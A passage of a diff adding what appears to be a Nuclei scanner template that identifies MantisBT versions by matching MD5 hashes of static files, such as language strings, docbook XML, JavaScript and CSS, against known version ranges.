1.2.5 - 1.2.8 + dsl: + - "(\"6274542ed8bd196778170e42233e3859\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"98a3f4df63290e9e930c829c946d3206\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"d033babb678cfebc13cdd157fc0e2a2b\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"0fa03e4fdb279a538fbe323c7eec104f\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"0216e6936a808231518588677805add8\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"da3e7b7ab29d04dbaf7676850cbb9543\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"e5ffc337ab594cd9aa4020e8222f0789\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.24.3 + dsl: + - "(\"8e248e7fc1efed76af14c4731c874efa\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_serbian_latin.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"de8f814a8d48193e14ac15afed27a2cc\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"4ef4adb6148cc9f783dfcc794e3deca2\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"f7f2bc25fdf98034fcd1eb40e460782f\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"6914f159931a7408dcf634783bf2f8c7\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"00b9c1632e050ef4bfcef4b494fe6f16\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"1f5d70db9039dc8b07bc2dfb4c06b8d8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_japanese.txt" + + matchers: + - type: dsl + name: 2.5.0 - 2.16.1 + dsl: + - "(\"78defcb70381c0deba2577a2b3246321\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.4.2 + dsl: + - "(\"ae330fff674fe8e2505c984fc1ff7991\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.3.3 + dsl: + - "(\"0fe69dc7bc439c5515d5fce4dd960ed9\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"56b2d8025633b9874f9861c1cf763850\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"f2c98d3365de10b7a9a0a52170cbd8a0\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"be6dae83d268af63bd4a52bdb814bada\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"ab8d1f36a8a257852dc01328d5cd8b01\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"634d72c350a9767be728a3fac4f53241\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"7e11d106e913cf3fef62f1c02cb00116\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"2237e3bba07e2a3047733511d356cdc2\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"ff6fa4f4ee820bfd96427e5c77e603c3\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.24.3 + dsl: + - "(\"fe411fd9f4c57a76691f4bb00dbee2e4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_chinese_traditional.txt" + + matchers: + - type: dsl + name: 2.4.0 - 2.24.3 + dsl: + - "(\"e68c60ab6cbe3d2ffec4e6a52a0082bc\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.3.3 + dsl: + - "(\"c56e2c2172bd2741fe21fb47652e66d3\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"31a8d0054be0b1382bda51f43bab7348\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"67182b174c84f60110870fbea036059c\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"6ce7bcbfdbeb233c53623b27aac12730\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"ff0bd25d8bc52ef7afaadd2979f94c74\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"d3b00b26c481e4ec345b7b0173d255df\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"7e6fe6bb1a034afc5d66f7e6b08e019b\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"edfcb9640f57880dec1ad2f6ab9791db\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_belarusian_tarask.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.24.3 + dsl: + - "(\"d51498d5f6aea7c211dd810d23390a76\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"09e89b3b0034df053d365700d6fa32d3\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.11 + dsl: + - "(\"0305866b412342994bb543331d9a3184\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"714f4783bc125a2e01ed736c645b733e\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"a033d6084555d0012723f348c2b370ab\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"5504fc58bbaa32760557ee67b1667e11\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"01f4e8217bea9ac6f14c3094e49123ae\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"466a154588514d385c235e4e0481bb8d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_serbian.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"7742706f6ba44e4f1d451077bcf0716b\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"b952e8792615136a330c825d97c3b2cb\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"0a4425bd8bfbd9b324c953cec29c7f58\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"b7fb2695345a0a4081b388ce762c9d9c\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"d3df506ac3aad30ef8244fcb8335a324\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"e381620f64b4c4d280968acc9c161789\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/database.xml" + + matchers: + - type: dsl + name: 2.1.0 - 2.24.3 + dsl: + - "(\"1f9b5eca120117bdae8fa0cc02c971b7\" == md5(body))" + - type: dsl + name: 2.0.1 + dsl: + - "(\"72cdc8213dc39aac5ba5756e6136717a\" == md5(body))" + - type: dsl + name: 2.0.0 + dsl: + - "(\"f5e86ccfb9c3fd85db971d322dff9e25\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"d516d6295b5e135352da0ec324aa4777\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_czech.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.8.1 + dsl: + - "(\"ad115c68d8b50743cec13cb5122eb852\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"85e5700fde98991839a3928a221e5006\" == md5(body))" + - type: dsl + name: 1.3.2 - 2.0.1 + dsl: + - "(\"0b9b1c24d7befbc8f77b10fadbf76e83\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"c8ffef544a9996bf46a9025a823e7411\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"d855e4f4c7c475028a9c1ea68e7f9def\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"846e4d70fbe177169ba87316106b345f\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"301d5627756efe61b6b213f218462246\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"aa70eedcfc2e6e734beba686cfaba300\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"3a6c7b7335afa1dab174789d9b44a81d\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"79d5a88d690c40c0d0f15947f3d62077\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"8f8f3bf189a81b62bd0e38838a36fcca\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"d57204bfd55e15d3f5794a825398c9e1\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"43ee915ec3357cedcdf00bdd549e87e0\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.21.3 + dsl: + - "(\"e8b8c31149c2364c141e3377c974e52a\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"454887a6938d235311715357408d5297\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"2a7da0350f3f6a91fd60029cca0d5fb6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_serbian.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.10.1 + dsl: + - "(\"9721803b017a81b06afc617670a00aa2\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"783763623bfd7262bc7fc2a97bbceaa2\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"d4a7a8f3e3b737f715bd6be1a473dc94\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"b00751269231a61a6d032951fd1068db\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"182b2c1a256dc969b4dd77ba3d55e458\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"aa7f59d66d5a5552127ba07ae51e0a42\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"f3e3cdcdcf2cd1f1230a4ef7bacd8956\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.17.2 + dsl: + - "(\"bab0849230f6f4ceef39edf8caec4af8\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.19.1 + dsl: + - "(\"06837d5e5d07ef9e40ed2ed315e88f45\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"702d7620927f6acf2033e5c90fe1cab8\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"4bafab382681ae83e7e56dfd4fd879f1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_german.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.19.1 + dsl: + - "(\"2015820fd8cf4717adadf77eb9c4837d\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.5.2 + dsl: + - "(\"82d9d905affa0c37e36cf671fd762cf1\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"e56d9025355a263fa003e1d6c45641c3\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"06233ff73681664cb9a725d2c11c3a1e\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"1c62b7eafa3b916070835c55563b9992\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"4c03cc35e1e65cc8a47c4848e5688677\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"174bb8cebabba856bbcc90d508aafaa4\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"eb16c7d77823f18d31f09e441cf4621f\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"9c3e8b41036993bbabf95ba62d787bce\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"d610e2cd453eed1a463361cc8d7577a5\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"87287656d7682eb769a73336796267e6\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"51b9ed95cebfd5ee94dc68f3d8641128\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"8bdb294d4c1a309c52155671ce4b58b1\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"b21819dd6d7af7694a5a333171eec7b9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_catalan.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.19.1 + dsl: + - "(\"af68a7f328a3df272762dbbe0e0dd0ce\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"3810ff0466c86cd82a3a30d79b36b371\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"dc96d7fce961f828600831d4d3fa2e47\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"f1a760768ad5fd5aec8cd9a7bab97a2a\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"920a7185f4789dd43b7082b680a6cf89\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"65ba6d82b600812a55a3b5a03c608d91\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"668ee267285e3ed64c0ef47f57ffc6b6\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"a4e70d1d349662f53e926b9d343ce166\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"fa58e0fca37c7248a144454b46f6ca35\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"2ef3b5eb45e96a88d13e5664542c7f7c\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"8564bb582d0104b42642554dd02ac714\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"35c985ec6aec8d6dd6ff16796709dc5b\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"bf234f210b05f43537574678b6567fb2\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_serbian_latin.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.22.2 + dsl: + - "(\"2429960d9683b90585dd959f54c9bd42\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"eaa867d6ecde8c5faa7b632ab308b678\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"ca2fb2966192f85e6f9fb810eb2749e3\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"740399978f77f8a79fcae20ad35639fb\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"36a1e923e7a3521ab282d09f6e75afdb\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"6582eda29bd4ebbc59b7e3f5e2d3764c\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"d4101470b8207a12884e7d0158ee0cb3\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"27403acd269e245f3e487ec33db2b76e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_greek.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.13.2 + dsl: + - "(\"537ab0c27becbefc7a797f6948d2fc29\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.5.2 + dsl: + - "(\"d41cbbbbc866dd8ec00b81e66a5b542c\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"c8abc8aeb5db490a8e70442b2eb819fe\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"611883d204a1f6de364a1720de9b2e7f\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"0b3cbaeeee03fff45c746f3d0a006f18\" == md5(body))" + - type: dsl + name: 2.14.0 + dsl: + - "(\"e38eec19e33662bf6ff5a41c89c4b39d\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.22.2 + dsl: + - "(\"94efe29cb05c8c69e885466b605f8f80\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"10c33a3cbf5ce82888dcfe721acdbfe9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/adm_config_report.js" + + matchers: + - type: dsl + name: 2.22.0 + dsl: + - "(\"b997f6c9e597a3b63e9be7707ac34095\" == md5(body))" + - type: dsl + name: 2.22.1 - 2.23.1 + dsl: + - "(\"e460043e9e29554411af98020ef8de46\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"2cbc328f01d4674ec00c4a9ba90c7c04\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/Page_Descriptions.xml" + + matchers: + - type: dsl + name: 1.3.7 - 2.18.1 + dsl: + - "(\"42f99793d49fc815af8bda3cab2f632c\" == md5(body))" + - type: dsl + name: 1.3.1 - 2.2.0 + dsl: + - "(\"bfacafe760b8814d663ce004e0db4e02\" == md5(body))" + - type: dsl + name: 1.3.0 + dsl: + - "(\"bf79722a9c97e7360dbe150d412cd338\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.19.1 + dsl: + - "(\"eaab069dee1f6ceb20079c208eee4595\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"437af183ae8e69e7db78ab69ee751b4f\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.23.1 + dsl: + - "(\"fd1621465385af0a530f9353b6547f6f\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"26aff45c5243d6d1f848ecb3e2c1d00f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_luxembourgish.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"fa03c6da02e4e4e47adce8d3d5120edb\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"441e111e772e945a2677713b55e87540\" == md5(body))" + - type: dsl + name: 2.14.0 + dsl: + - "(\"4a9fff48c5c6a3a6729cb4fe242dc6c8\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.15.1 + dsl: + - "(\"5f2ed4080528e44333f294e85441813c\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"4aab1f67c176b6f5d6967661e7aa1b69\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.19.1 + dsl: + - "(\"87f583d35a9f228776018e7b95c0c294\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"0a9c31746de37f0d43bd24a192a24bb7\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"55ab3af7af403a808fb7e9f3f9a3eb83\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"a4c86b0cfc1a9c656b72474ffac3ee4b\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"b11c5287fa0054c176f0a1244ec9a407\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_qqq.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.12.2 + dsl: + - "(\"c86d08c595da9575f42d432e035d07d2\" == md5(body))" + - type: dsl + name: 2.5.0 - 2.5.2 + dsl: + - "(\"61e0e943a674ee9c2ccce08d30381b32\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.4.2 + dsl: + - "(\"705c3a7fcdb904a2c4ab514e6f7030e6\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.2.4 + dsl: + - "(\"05329dbc886ca40ec4238491a14bdfca\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"148baf55650bca90c16647f4dfacd587\" == md5(body))" + - type: dsl + name: 1.3.4 - 1.3.20 + dsl: + - "(\"e06623e3a541b1f206c7aa2b336230db\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"1e10b1046be20e4d827796ba227313c0\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"cbeab2f08c9aa5ab494785acb62556d5\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"7d2f57d4e06495a45575b09405434800\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"31117aba073a44b4cf137c066819323e\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.4 + dsl: + - "(\"ba8a8e4730aaa2378c25b66486986a92\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"53a98c05bef5dea23954f808b56ae196\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"eb83f0977a278d756057b6153c5dbd70\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"7422096e633521c4daaa2c2b2c1d84f4\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.19.1 + dsl: + - "(\"82b341d3ca6fc28d10f403f84e3d69f7\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"f024ec874af3f387804df6c8258dfd88\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"5e3825ddc5b7dc94397217447597437b\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"aa130d69161eb3c91c424ad1bf97bc84\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"4c61bbeab3c3abd23738f26e82a06ae7\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_turkish.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.22.2 + dsl: + - "(\"dab70fc2516f8065f8936cf494d505a6\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.11 + dsl: + - "(\"57ab31e61bd922248b9f1ed4b4ef010f\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"9eb5f92ca0448d0201c45e8ecd23b0b5\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"5a6fc6038e930ef1506d9063cd8ebd43\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"32b806f7916fbdcb4db057a227bf3794\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"936c8471d6fd22df7f6a9ead9d15a9c3\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"d967dae6f8bbb159698ab2f8177fbe81\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"859622256e4aa85fec846a0217dc140b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/ace-mantis.css" + + matchers: + - type: dsl + name: 2.3.0 - 2.6.0 + dsl: + - "(\"297efdef3fb35297a6b47b9f0b09a58f\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"a32f3f8a9ba9c43564d7d8a551ef0dd9\" == md5(body))" + - type: dsl + name: 2.1.1 - 2.1.3 + dsl: + - "(\"a54b265780669d714f305bfa95ef7440\" == md5(body))" + - type: dsl + name: 2.1.0 + dsl: + - "(\"0b25f9d019cd982445478bfcb89fff58\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"1d822ccdb6d2142ae52c092f754bcc4f\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.19.1 + dsl: + - "(\"39eac6154892cac7af2c6b51308b676c\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"beab5586b309516ea351aa701aa0a37a\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.22.2 + dsl: + - "(\"93ab3da574cec232d55f3163b1e0f6f2\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"bfeb262567580d426e164ba7477db8ce\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"a2b359cbe974bafc3ab19f8d54fa674c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_skr-arab.txt" + + matchers: + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"67c65d21f522945fb3138e7d64920839\" == md5(body))" + - type: dsl + name: 2.14.0 + dsl: + - "(\"8c9e47303a317246150b5924171327d6\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.15.1 + dsl: + - "(\"de55658b87b0f39185418abc125c5c6f\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.17.2 + dsl: + - "(\"04e58769713d563457fa7a6b43f3d850\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.19.1 + dsl: + - "(\"9b84b36906dc176452ace2092523686b\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"38720b82dbdbc4af475a3da8e5522105\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.24.3 + dsl: + - "(\"cd863c13bd4d9e16a3cdf5a53d2d17f8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/display.xml" + + matchers: + - type: dsl + name: 2.3.0 - 2.10.1 + dsl: + - "(\"c67c5b21e6313818da769e9004fe1c23\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.2.4 + dsl: + - "(\"628487fe81c473bb5adedb4e1ff8a0ff\" == md5(body))" + - type: dsl + name: 1.3.1 - 1.3.20 + dsl: + - "(\"1f640424eb47779ef436974aa3fc7762\" == md5(body))" + - type: dsl + name: 1.3.0 + dsl: + - "(\"c1150d4ddd625aea6883e185119cceca\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.21.3 + dsl: + - "(\"87085590b80d6b0934cd839a8f3188d3\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.24.3 + dsl: + - "(\"13f455ba57f6d0f3f04feb70a50c3381\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_volapuk.txt" + + matchers: + - type: dsl + name: 2.0.0 - 2.10.1 + dsl: + - "(\"b397fcf5fb0182f91a3729dbeeeededb\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"e546b23f0080b5484e0e3a96ae700885\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"3a0aae8d433db7fdd7aa6d65f6c545d3\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"3767df00932c597fe082926e2d1692c8\" == md5(body))" + - type: dsl + name: 1.2.1 - 1.2.4 + dsl: + - "(\"9afb52e595fbb1947aa2f6817e095f67\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"0dcdcb6cd2ce4faad4fa2a8de6842ab6\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"437e208c24d1ea9f811f18cdc5234c13\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"05e6215ec7a005b53df7eae95d0d115a\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"2a47a66fc5715a9d75dc269c9b39f0ff\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.15.1 + dsl: + - "(\"1f8aed0144d049dd4c84941d04112646\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"5c4dae394c5f5a1b47d44b23c1ad3671\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"dc631bf3009a9bd87f2b1929d573659a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_asturian.txt" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"0d9d3a535af49576abb24bf88fbe5630\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.5.2 + dsl: + - "(\"daea1e5c2835ebabeac7670aab6a56b6\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.2.4 + dsl: + - "(\"98459e53f0e6ca14833db2fbc37ab07a\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"84df3d8245b1d4bbc3cb982dcdbb9df9\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"10fa6cae32a46832de73f15aec817b49\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"76f63cb0191049e4094c1be9f13379a9\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.7.1 + dsl: + - "(\"8d9f95a86274735f0b08399c2ac7ed76\" == md5(body))" + - type: dsl + name: 2.8.0 - 2.8.1 + dsl: + - "(\"0c9b33be6b234f6497ed8828c0231db0\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.12.2 + dsl: + - "(\"716852ac18142e41c0b946283a7965aa\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - 